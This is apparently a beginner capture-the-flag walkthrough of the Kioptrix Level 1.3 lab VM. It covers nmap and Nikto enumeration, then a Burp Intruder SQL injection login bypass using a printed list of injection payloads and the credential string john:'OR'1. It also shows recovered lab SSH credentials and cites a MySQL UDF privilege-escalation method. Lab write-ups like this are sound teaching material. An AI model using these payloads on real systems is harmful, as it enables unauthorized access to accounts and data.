KIOPTRIX: LEVEL 1.3 (#4) Walkthrough
This is similar to the past kioptrix series. Similarly, this is best for beginners. As usual, let me start with a beautiful quote.
This is similar to the past kioptrix series. Similarly, this is best for beginners. As usual, let me start with a beautiful quote.
“The opportunity of defeating the enemy is provided by the enemy himself.” — Sun Tzu
Enumeration
Let’s start with enumeration…
sudo nmap -p- -T4 -A 192.168.103.183
We have found the running services:
- ssh
- http
- smb
More Enumeration…
- SSH
This version of SSH does not have any particular vulnerability which we can exploit. However, there is a possible user enumeration weakness available.
2. HTTP
Nothing sensitive in the source code and no robots.txt.
- Nikto
We can find the version of the software as Apache/2.2.8 + PHP/5.2.4
- GoBuster
3. SMB
Finding POI (Point Of Intrusion)
From the enumeration, i could say that we have few possible POIs. However, let me tell you what all are not the possible POIs:
- SSH — It does not have any exploit available. Go with possible User Enumeration on worst case.
- SMB — Found nothing sensitive on this.
- Apache and PHP are not having any Exploits available for this set-up.
Therefore, I could say that the POI will be through the website.
- LFI / RFI
- SQLi
Since i found a login page, i will test for SQLi.
Exploitation
I used Burp to test the with SQLi payloads.
Payload:
'
''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/
Procedure:
- Catch the Login request in Burp.
2. Send it to Intruder and Use sniper.
3. Execute and Analyse the response Length.
I used creds as john:’OR’1
and got into the page…
Let me try the same on SSH…
- robert:ADGAdsafdfwt4gadfga==
- john:MyNameIsJohn
But, it is a restricted shell…😩
Privilege Escalation
I found a UDF (User Defined Function in MySQL). Hence, i used https://recipeforroot.com/mysql-to-system-root/ to get myself root privileges.